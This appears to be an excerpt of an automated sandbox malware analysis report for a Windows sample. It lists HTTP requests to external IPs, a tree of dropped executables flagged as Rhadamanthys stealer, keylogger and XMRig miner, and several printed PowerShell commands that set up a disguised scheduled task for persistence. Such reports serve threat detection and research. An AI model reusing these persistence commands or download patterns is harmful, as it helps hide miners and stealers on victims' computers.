Dec 5, 2024 17:35:48.990930080 CET	1236	IN	Data Raw: 0a 6a 9f 08 33 5a b8 00 48 32 c0 9b 00 87 ff 75 44 54 a0 95 d1 eb 90 73 bc 0a c4 df 11 25 1f 31 aa b6 c3 e9 8c f3 97 77 2f 07 de 35 8c cb ba ad dd 7f 5a 81 a2 04 d4 61 14 71 3a 99 5f 6b 8e a0 d8 d1 1f 7d 48 03 a6 3a b5 d6 73 77 b7 85 37 8f 19 14 Data Ascii: j3ZH2uDTs%1w/5Zaq:_k}H:sw7d%hkc}s9BaOQQs?pisbbMFvQSE@l=)0x"./<x&+n>14#<Xo_:*q6!9

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.11	50085	185.215.113.66	80

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:51.019076109 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:52.381247044 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:52 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.11	50087	91.202.233.141	80

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:55.551012039 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:35:56.905462980 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:56 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.11	50089	91.202.233.141	80

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:59.095434904 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:36:00.434921026 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:36:00 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	11:31:36
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\f5TWdT5EAc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\f5TWdT5EAc.exe"
Imagebase:	0x400000
File size:	476'995 bytes
MD5 hash:	001C8845E2489435657B200199B369F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:31:39
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\34D7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\34D7.exe"
Imagebase:	0x250000
File size:	10'240 bytes
MD5 hash:	08DAFE3BB2654C06EAD4BB33FB793DF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:31:44
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\896429707.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\896429707.exe
Imagebase:	0x400000
File size:	80'896 bytes
MD5 hash:	0C883B1D66AFCE606D9830F48D69D74B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:31:47
Start date:	05/12/2024
Path:	C:\Windows\sysnldcvmr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\sysnldcvmr.exe
Imagebase:	0x400000
File size:	80'896 bytes
MD5 hash:	0C883B1D66AFCE606D9830F48D69D74B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	11:31:59
Start date:	05/12/2024
Path:	C:\Windows\sysnldcvmr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\sysnldcvmr.exe"
Imagebase:	0x400000
File size:	80'896 bytes
MD5 hash:	0C883B1D66AFCE606D9830F48D69D74B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:32:00
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1171111125.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1171111125.exe
Imagebase:	0x550000
File size:	9'216 bytes
MD5 hash:	323CB4364490F83204B51B0F7F3766F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:32:04
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\2779421088.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2779421088.exe
Imagebase:	0xf40000
File size:	449'536 bytes
MD5 hash:	BD0CAD52FD3A6537CC7AF21852619340
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.1602277553.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.1606012463.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:32:06
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:	0x130000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.1606124598.00000000027F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000002.1704824267.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:32:08
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\78476062.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\78476062.exe
Imagebase:	0x7c0000
File size:	10'240 bytes
MD5 hash:	96509AB828867D81C1693B614B22F41D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 91%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:32:16
Start date:	05/12/2024
Path:	C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\fontdrvhost.exe"
Imagebase:	0x7ff7164f0000
File size:	827'408 bytes
MD5 hash:	BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:32:16
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\640832494.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\640832494.exe
Imagebase:	0x1d0000
File size:	54'784 bytes
MD5 hash:	84897CA8C1AA06B33248956AC25EC20A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	11:32:19
Start date:	05/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:32:19
Start date:	05/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
Imagebase:	0x7ff618200000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:32:19
Start date:	05/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5444 -s 136
Imagebase:	0x7ff618200000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:32:20
Start date:	05/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	11:32:21
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\2688734187.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\2688734187.exe
Imagebase:	0x7ff6d3c30000
File size:	5'827'584 bytes
MD5 hash:	13B26B2C7048A92D6A843C1302618FAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:32:25
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1657630034.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1657630034.exe
Imagebase:	0x390000
File size:	62'976 bytes
MD5 hash:	77C5EB90118287F666886FC34210C176
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:32:27
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:32:27
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:32:34
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\2910625892.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2910625892.exe
Imagebase:	0x9e0000
File size:	66'560 bytes
MD5 hash:	69A5D3C6E993B5A1BAFACF806647DF7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:32:39
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852
Imagebase:	0x250000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:32:39
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332
Imagebase:	0x250000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:32:42
Start date:	05/12/2024
Path:	C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
Imagebase:	0x7ff731cd0000
File size:	5'827'584 bytes
MD5 hash:	13B26B2C7048A92D6A843C1302618FAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, Author: unknown
Antivirus matches:	Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:32:48
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2096, Parent PID: 2024

General

Target ID:	31
Start time:	11:32:48
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:33:07
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\conhost.exe
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	11:33:07
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:33:07
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:33:39
Start date:	05/12/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dwm.exe
Imagebase:	0x7ff613010000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.3945886291.000001A567EC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	11:33:30
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7772, Parent PID: 7980

General

Target ID:	39
Start time:	11:33:30
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	11:33:59
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6604, Parent PID: 6772

General

Target ID:	44
Start time:	11:33:59
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
